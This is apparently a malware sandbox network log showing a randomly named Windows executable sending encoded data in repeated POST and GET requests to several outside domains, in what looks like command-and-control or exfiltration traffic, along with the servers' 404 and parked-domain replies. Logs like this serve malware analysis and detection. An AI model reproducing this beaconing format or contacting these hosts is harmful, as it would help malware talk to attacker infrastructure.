User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Dec 12, 2024 00:18:54.046468973 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 11 Dec 2024 23:18:53 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49795 | 161.97.142.144 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:18:55.433875084 CET | 504 | OUT | GET /gn0y/?LDVlCz=deG7RjeXnjjKJ6Ot/ZvT1ZCOdrvHxkgph9CMZ5BhYMmF8u0wO9qMaDcK53O3JwyOf3l+Oc7MzAVt2qPkHXgf7ZhvCL0D4R10rxSbaYIqOAV7xlWd89x6BKiu35RrP0Id3g==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
Host: www.070001813.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Dec 12, 2024 00:18:56.670917988 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 11 Dec 2024 23:18:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cce1df-b96"
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                  Dec 12, 2024 00:18:56.670947075 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                  Dec 12, 2024 00:18:56.670959949 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                  Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49811 | 84.32.84.32 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:19:02.598135948 CET | 761 | OUT | POST /f95q/ HTTP/1.1
Host: www.activateya.life
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.activateya.life
Referer: http://www.activateya.life/f95q/
Content-Length: 207
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Data Ascii: LDVlCz=pZxe0nVoO/5KSzlbxrfvnE+v0XhYA/UvDucR9V0v9CeijF1W23enVMIrZ/MyXRXQE3ysePvEwSzzZVp4wSX/NhU8PCpvfzUbStvPFjhIkK7VcNZyXHm8MvDvK+Kh9tImyI5s+xqwMtLT8Us1ocsJdAjFbAOMWvGBJfEsYA1CtULkajyr+DdSAyXmiWNyuMQb3FZxoO8=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49817 | 84.32.84.32 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:19:05.270868063 CET | 781 | OUT | POST /f95q/ HTTP/1.1
Host: www.activateya.life
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.activateya.life
Referer: http://www.activateya.life/f95q/
Content-Length: 227
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Data Ascii: LDVlCz=pZxe0nVoO/5KAnZbzMjvmk+s73hYJfUrDuQR9QQ/9Q6ijlFW312nSMIrBPM3KBXPE32KeKXEwTXzZXx4wl7gNxU+ayppCjUbStvPFnJikKzVd8JyRWm7EPDsN+Kh5tIiyI5O+zffMuzT8Wk1oOIKEwjLGwPtbOreJvQ5cDo52CHcfVDBkhV6TS7eyFFF/8xytmJB2ZokYsnFSo90xg6CC95dTNaP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49824 | 84.32.84.32 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:19:07.958623886 CET | 1798 | OUT | POST /f95q/ HTTP/1.1
Host: www.activateya.life
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.activateya.life
Referer: http://www.activateya.life/f95q/
Content-Length: 1243
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Data Ascii: LDVlCz= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49834 | 84.32.84.32 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:19:10.651905060 CET | 506 | OUT | GET /f95q/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=kbZ+3TVQWfE7KiBcybfm9WvlwV1TJfIMHZM6kD8OpyCP9Gh7sWOPFpouLIgiGz3sUBqRfaXNkxnyQnhTpFi/D08FMGsEDjNddsm/ASVO0JLXKussNUmxA8HGD8mS8NlSug== HTTP/1.1
Host: www.activateya.life
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Dec 12, 2024 00:19:11.738887072 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 23:19:11 GMT
Content-Type: text/html
Content-Length: 9973
Connection: close
Vary: Accept-Encoding
Server: hcdn
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: c457f16e124e68ccbbc712bdb09f15f9-bos-edge1
Expires: Wed, 11 Dec 2024 23:19:10 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
Dec 12, 2024 00:19:11.738903046 CET | 1236 | IN | Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
Dec 12, 2024 00:19:11.738919020 CET | 448 | IN | Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
Dec 12, 2024 00:19:11.739078999 CET | 1236 | IN | Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
Dec 12, 2024 00:19:11.739093065 CET | 1236 | IN | Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
Dec 12, 2024 00:19:11.739108086 CET | 1236 | IN | Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
Dec 12, 2024 00:19:11.739124060 CET | 1236 | IN | Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
Dec 12, 2024 00:19:11.739656925 CET | 328 | IN | Data Ascii: urn e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=f
Dec 12, 2024 00:19:11.739672899 CET | 1236 | IN | Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
Dec 12, 2024 00:19:11.739686966 CET | 884 | IN | Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49850 | 124.71.162.21 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 00:19:17.815320969 CET | 755 | OUT | POST /qei1/ HTTP/1.1
Host: www.walkecode.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.walkecode.top
Referer: http://www.walkecode.top/qei1/
Content-Length: 207
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
Data Ascii: LDVlCz=qPqeF1jEpgqjD1k7MzjBFvmQ/z2kBYFhxv3DAheVMpTQzuiD1RHvVSpjqOlls6IZupcoCxYSqAicsPIg25wdJmy9ZvyLQtBrGjTkXn19RwNhl+fhepDngmDc/NtJx2YDUvRGZ2AHHzbecH5cE5XSdYdKt7WJ9rMXr2bizwNj5LZtYwzS13xV+eMsrOk+ns38Ef5BKEI=
Dec 12, 2024 00:19:19.280900002 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 11 Dec 2024 23:19:19 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.549856124.71.162.21805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:20.532223940 CET775OUTPOST /qei1/ HTTP/1.1
                                                                                  Host: www.walkecode.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.walkecode.top
                                                                                  Referer: http://www.walkecode.top/qei1/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 71 50 71 65 46 31 6a 45 70 67 71 6a 42 51 30 37 4c 55 33 42 4e 76 6d 58 6a 44 32 6b 62 6f 46 6c 78 76 7a 44 41 6c 50 49 4d 62 48 51 7a 4c 65 44 6e 46 72 76 55 53 70 6a 68 75 6c 6b 6f 36 4a 58 75 70 42 62 43 30 67 53 71 45 4b 63 73 4b 30 67 32 4f 45 65 4a 32 79 37 43 2f 79 4a 4e 64 42 72 47 6a 54 6b 58 6e 68 54 52 77 46 68 6c 75 76 68 4d 64 33 6b 2b 32 44 66 70 64 74 4a 6e 47 59 35 55 76 51 56 5a 31 46 73 48 77 6a 65 63 43 46 63 46 73 6a 52 47 49 64 4d 31 62 58 4f 34 72 4e 4f 6a 56 2f 7a 30 6a 6c 6c 6e 4c 52 51 64 47 43 34 76 56 35 39 74 2b 67 55 37 64 73 4a 32 63 57 56 65 38 70 78 55 54 64 74 67 49 39 55 2f 4b 4a 67 31 53 6e 65 73 7a 58 59 46 42 32 50
                                                                                  Data Ascii: LDVlCz=qPqeF1jEpgqjBQ07LU3BNvmXjD2kboFlxvzDAlPIMbHQzLeDnFrvUSpjhulko6JXupBbC0gSqEKcsK0g2OEeJ2y7C/yJNdBrGjTkXnhTRwFhluvhMd3k+2DfpdtJnGY5UvQVZ1FsHwjecCFcFsjRGIdM1bXO4rNOjV/z0jllnLRQdGC4vV59t+gU7dsJ2cWVe8pxUTdtgI9U/KJg1SneszXYFB2P
                                                                                  Dec 12, 2024 00:19:22.001977921 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:19:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.5 | 49864 | 124.71.162.21 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:23.218812943 CET | 1792 | OUT | POST /qei1/ HTTP/1.1
                                                                                  Host: www.walkecode.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.walkecode.top
                                                                                  Referer: http://www.walkecode.top/qei1/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 71 50 71 65 46 31 6a 45 70 67 71 6a 42 51 30 37 4c 55 33 42 4e 76 6d 58 6a 44 32 6b 62 6f 46 6c 78 76 7a 44 41 6c 50 49 4d 62 66 51 79 35 47 44 31 30 72 76 46 69 70 6a 36 4f 6c 35 6f 36 4a 61 75 70 4a 58 43 31 63 6f 71 47 79 63 74 6f 73 67 30 37 6f 65 43 32 79 37 64 76 79 55 51 74 41 70 47 6a 44 67 58 6e 78 54 52 77 46 68 6c 74 33 68 63 5a 44 6b 38 32 44 63 2f 4e 74 46 78 32 5a 33 55 76 70 67 5a 32 70 61 45 41 44 65 66 69 31 63 48 65 37 52 62 59 64 4f 67 62 58 73 34 72 42 72 6a 56 54 2f 30 6a 67 79 6e 4a 42 51 63 53 62 33 32 68 4e 6b 36 66 67 51 33 4b 77 45 32 5a 47 7a 65 4e 51 4b 5a 52 68 78 70 35 46 43 71 50 78 58 7a 44 47 6f 31 48 53 58 55 6c 47 50 6e 6d 58 57 41 33 53 6e 6d 72 2f 64 41 30 53 4c 6a 38 43 63 55 4e 64 46 62 4c 43 37 64 69 67 64 39 4a 54 4c 54 44 49 64 46 66 53 66 45 71 54 4f 70 34 33 4e 32 62 41 61 59 4c 6c 73 59 35 35 6b 67 78 38 64 66 76 53 4a 49 6f 4e 34 6b 51 48 39 50 66 70 73 6f 72 63 59 63 2f 64 4a 42 4e 74 7a 4b 32 61 35 4a 56 39 55 78 2b 4b 58 43 43 45 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=qPqeF1jEpgqjBQ07LU3BNvmXjD2kboFlxvzDAlPIMbfQy5GD10rvFipj6Ol5o6JaupJXC1coqGyctosg07oeC2y7dvyUQtApGjDgXnxTRwFhlt3hcZDk82Dc/NtFx2Z3UvpgZ2paEADefi1cHe7RbYdOgbXs4rBrjVT/0jgynJBQcSb32hNk6fgQ3KwE2ZGzeNQKZRhxp5FCqPxXzDGo1HSXUlGPnmXWA3Snmr/dA0SLj8CcUNdFbLC7digd9JTLTDIdFfSfEqTOp43N2bAaYLlsY55kgx8dfvSJIoN4kQH9PfpsorcYc/dJBNtzK2a5JV9Ux+KXCCE [TRUNCATED]
                                                                                  Dec 12, 2024 00:19:24.709273100 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:19:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  12 | 192.168.2.5 | 49873 | 124.71.162.21 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:19:25.874519110 CET | 504 | OUT | GET /qei1/?LDVlCz=nNC+GBX2ggWuM05tEEqRTuHIkAvcf+dXy/bvByniPoLRj52NglzWV1Nft7BNtL9++4tRfUwg9XmNi4A2kp9kOCOyWvDUT5wtJii7I2tTBBgakefdRMv39WDJ4M987EpnCg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.walkecode.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:19:27.352281094 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:19:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
